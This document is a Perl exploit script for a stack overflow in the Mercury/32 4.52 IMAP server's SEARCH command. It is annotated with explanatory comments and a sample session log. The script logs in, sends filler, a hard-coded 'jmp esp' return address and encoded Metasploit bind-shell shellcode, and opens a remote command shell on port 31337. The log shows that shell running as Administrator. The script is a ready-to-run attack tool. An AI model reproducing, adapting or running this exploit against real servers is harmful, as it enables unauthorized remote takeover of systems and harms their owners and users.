# Title : Mercury/32 4.52 IMAPD SEARCH command Post-Auth Overflow Exploit
# Published : 2007-09-19
# Author : void
# Z:\Exp>mercury_SEARCH.pl 127.0.0.1 143 void ph4nt0m.org
# Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit
# Found & Code by void# ph4nt0m.org
#
# S: * OK mercury.ph4nt0m.org IMAP4rev1 Mercury/32 v4.52 server ready.
# C: pst06 LOGIN void ph4nt0m.org
# S: pst06 OK LOGIN completed.
# C: pst06 SELECT INBOX
# S: * 0 EXISTS
# S: * 0 RECENT
# S: * FLAGS (Deleted Draft Seen Answered)
# S: * OK [UIDVALIDITY 1190225819] UID Validity
# S: * OK [UIDNEXT 1] Predicted next UID
# S: * OK [PERMANENTFLAGS (Deleted Draft Seen Answered)] Settable message flags
# S: pst06 OK [READ-WRITE] SELECT completed.
# [*] Send Evil Payload ...
# [+] Done! Check out cmdshell@127.0.0.1:31337. Good Luck :-P
#
# Z:\Exp>nc -vv 127.0.0.1 31337
# DNS fwd/rev mismatch: localhost != GNU
# localhost [127.0.0.1] 31337 (?) open
# Microsoft Windows XP [版本 5.1.2600]            (CHS-locale cmd.exe banner: "Version")
# (C) 版权所有 1985-2001 Microsoft Corp.          ("All rights reserved")
#
# e:\MERCURY>whoami
# whoami
# Administrator
#
# e:\MERCURY>
use strict;
use warnings;
use IO::Socket;
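# --- Target / payload parameters ---------------------------------------------
# Positional arguments: HOST PORT USER PASS; each falls back to the default
# shown. The bug is post-auth, so USER/PASS must be a valid mailbox account on
# the target, and LOGIN carries them in cleartext on port 143.
#
# The host must be a quoted string: an unquoted 127.0.0.1 is parsed by Perl as
# a v-string (the four bytes 0x7f 0x00 0x00 0x01), not as a host name.
my $imap_host = shift || "127.0.0.1";
my $imap_port = shift || 143;
my $imap_user = shift || "void";
my $imap_pass = shift || "ph4nt0m.org";
my $banner =
    " Mercury/32 v4.52 IMAPD SEARCH command Post-Auth Stack Overflow Exploit\n" .
    " Found & Code by void#ph4nt0m.org\n" .
    "\n";
# 60-byte filler placed before the return address in the SEARCH argument
# (presumably the distance to the saved return address on the IMAPD stack --
# the script documents no offset, so re-verify on a debugger if the target differs).
my $cheers = "Celebrate_the_6th_anniversary_of_the_founding_of_Ph4nt0m.org";
# Return address 0x7ffa4512, little-endian, which the author reports as a
# "jmp esp" usable across CHS Windows 2000/XP/2003. It is a hard-coded absolute
# address: fine on those pre-ASLR systems, but it must be re-derived for any
# other locale or build.
my $jmpesp = "\x12\x45\xfa\x7f";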
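# /* win32_bind - EXITFUNC=thread LPORT=31337 Size=347 Encoder=Pex http://metasploit.com */
# Metasploit win32_bind shell, Pex-encoded. The listening port (31337) is baked
# into the shellcode, so changing it means regenerating the payload with the
# same bad-character set. The encoder was told to avoid these bytes, which the
# IMAP command parser would otherwise cut or rewrite:
# bad char: 0x00 0x0A 0x0D 0x20 0x29
# Note that the resulting bind shell is unauthenticated -- anyone who can reach
# the port gets the shell, so connect promptly and close it when finished.
my $shellcode =
    "\x31\xc9\x81\xe9\xb0\xff\xff\xff\xe8\xff\xff\xff\xff\xc0\x5e\x81" .
    "\x76\x0e\xfa\xd1\xa5\x6f\x83\xee\xfc\xe2\xf4\x06\xbb\x4e\x22\x12" .
    "\x28\x5a\x90\x05\xb1\x2e\x03\xde\xf5\x2e\x2a\xc6\x5a\xd9\x6a\x82" .
    "\xd0\x4a\xe4\xb5\xc9\x2e\x30\xda\xd0\x4e\x26\x71\xe5\x2e\x6e\x14" .
    "\xe0\x65\xf6\x56\x55\x65\x1b\xfd\x10\x6f\x62\xfb\x13\x4e\x9b\xc1" .
    "\x85\x81\x47\x8f\x34\x2e\x30\xde\xd0\x4e\x09\x71\xdd\xee\xe4\xa5" .
    "\xcd\xa4\x84\xf9\xfd\x2e\xe6\x96\xf5\xb9\x0e\x39\xe0\x7e\x0b\x71" .
    "\x92\x95\xe4\xba\xdd\x2e\x1f\xe6\x7c\x2e\x2f\xf2\x8f\xcd\xe1\xb4" .
    "\xdf\x49\x3f\x05\x07\xc3\x3c\x9c\xb9\x96\x5d\x92\xa6\xd6\x5d\xa5" .
    "\x85\x5a\xbf\x92\x1a\x48\x93\xc1\x81\x5a\xb9\xa5\x58\x40\x09\x7b" .
    "\x3c\xad\x6d\xaf\xbb\xa7\x90\x2a\xb9\x7c\x66\x0f\x7c\xf2\x90\x2c" .
    "\x82\xf6\x3c\xa9\x82\xe6\x3c\xb9\x82\x5a\xbf\x9c\xb9\xdf\x06\x9c" .
    "\x82\x2c\x8e\x6f\xb9\x01\x75\x8a\x16\xf2\x90\x2c\xbb\xb5\x3e\xaf" .
    "\x2e\x75\x07\x5e\x7c\x8b\x86\xad\x2e\x73\x3c\xaf\x2e\x75\x07\x1f" .
    "\x98\x23\x26\xad\x2e\x73\x3f\xae\x85\xf0\x90\x2a\x42\xcd\x88\x83" .
    "\x17\xdc\x38\x05\x07\xf0\x90\x2a\xb7\xcf\x0b\x9c\xb9\xc6\x02\x73" .
    "\x34\xcf\x3f\xa3\xf8\x69\xe6\x1d\xbb\xe1\xe6\x18\xe0\x65\x9c\x50" .
    "\x2f\xe7\x42\x04\x93\x89\xfc\x77\xab\x9d\xc4\x51\x7a\xcd\x1d\x04" .
    "\x62\xb3\x90\x8f\x95\x5a\xb9\xa1\x86\xf7\x3e\xab\x80\xcf\x6e\xab" .
    "\x80\xf0\x3e\x05\x01\xcd\xc2\x23\xd4\x6b\x3c\x05\x07\xcf\x90\x05" .
    "\xe6\x5a\xbf\x71\x86\x59\xec\x3e\xb5\x5a\xb9\xa8\x2e\x75\x07\x15" .
    "\x1f\x45\x0f\xa9\x2e\x73\x90\x2a\xd1\xa5\x6f";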
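# --- Main flow ---------------------------------------------------------------
# Connect, authenticate, select INBOX, then send one oversized SEARCH argument.
# The credentials are interpolated unquoted into LOGIN, so a user name or
# password containing a space or double quote would need IMAP quoting first.
print $banner;
sleep(1);
# Timeout bounds the TCP connect; on failure IO::Socket::INET leaves the reason in $@.
my $sock = IO::Socket::INET->new(
    PeerHost => $imap_host,
    PeerPort => $imap_port,
    Proto    => "tcp",
    Timeout  => 30,
) or die "Connect error: $@\n";
# Consume the untagged greeting before the first command.
imap_recv("");
imap_send("pst06 LOGIN $imap_user $imap_pass\r\n", "rv");
imap_send("pst06 SELECT INBOX\r\n", "rv");
# Overflow layout: 60-byte filler, then the 4-byte "jmp esp" return address,
# then the shellcode that the jump lands on. Sent raw as the SEARCH argument.
my $payload = $cheers . $jmpesp . $shellcode;
print "[*] Send Evil Payload ...\n";
imap_send("pst06 SEARCH ON $payload\r\n", "");
sleep(1);
# The "@" must be escaped: an unescaped "@$imap_host" would interpolate as an
# array dereference and die under "use strict".
print "[+] Done! Check out cmdshell\@$imap_host:31337. Good Luck :-P\n";
$sock->close();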
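# imap_send(COMMAND, FLAGS)
# Writes COMMAND to the file-scoped $sock. FLAGS is a string of option letters:
#   v - echo the command as "C: ..."; commands longer than 75 bytes are shown
#       as head ... tail so the overflow line does not flood the terminal;
#   r - afterwards read the reply up to the tagged OK/NO/BAD line, using the
#       text up to and including the first space (the tag) as the prefix.
# Returns nothing. An undefined FLAGS is treated as "".
sub imap_send
{
    my ($cmd, $flags) = @_;
    $flags = "" unless defined $flags;
    if ($flags =~ /v/)
    {
        if (length($cmd) <= 75)
        {
            print "C: " . $cmd;
        }
        else
        {
            # The tail stops one byte short so the command's own newline is not printed twice.
            print "C: " . substr($cmd, 0, 36) . " ... " . substr($cmd, -36, -1) . "\n";
        }
    }
    print $sock $cmd;
    if ($flags =~ /r/)
    {
        imap_recv(substr($cmd, 0, index($cmd, " ") + 1));
    }
}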
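# imap_recv(TAG_PREFIX)
# Reads lines from the file-scoped $sock, echoing each as "S: ...", until a
# line contains TAG_PREFIX immediately followed by OK, NO or BAD (the tagged
# completion response). "" makes any OK/NO/BAD line terminate the loop, which
# is how the untagged "* OK ..." greeting is consumed. The prefix is matched
# literally (\Q...\E) so regex metacharacters in a tag cannot alter the match.
# Returns nothing.
# NOTE(review): there is no read timeout; a server that never answers (for
# instance an IMAPD that crashed after the overflow) blocks here until the
# connection closes.
sub imap_recv
{
    my $prefix = defined $_[0] ? $_[0] : "";
    # A lexical line variable avoids clobbering the caller's global $_.
    while (my $line = <$sock>)
    {
        print "S: " . $line;
        last if $line =~ /\Q$prefix\E(?:OK|NO|BAD)/;
    }
}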